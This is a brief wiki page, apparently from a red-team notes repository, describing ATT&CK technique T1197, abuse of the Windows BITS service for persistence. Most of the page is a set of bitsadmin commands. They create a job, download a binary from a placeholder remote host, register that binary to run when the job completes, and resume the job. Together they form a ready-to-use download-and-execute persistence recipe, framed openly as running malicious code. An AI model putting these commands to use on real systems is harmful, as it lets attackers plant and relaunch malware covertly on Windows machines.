T1197 BITS Persistence - CraigDonkin/Infrastructure GitHub Wiki

T1197: BITS Persistence

Abuse BITS to download, execute malicious code
Allow persistence by creating a long standing job or invoking a program when a job completes or errors

bitsadmin /transfer job /download /priority high [downloadlink] [download location]

bitsadmin /create persistence
bitsadmin /addfile persistence "http://x/binary.exe" "C:\location\binary.exe"
bitsadmin /SetNotifyCmdLine persistence C:\location\binary.exe NULL
bitsadmin /resume persistence

Resources

https://mgreen27.github.io/posts/2018/02/18/Sharing_my_BITS.html

https://www.secureworks.com/blog/malware-lingers-with-bits

⚠️ GitHub.com Fallback ⚠️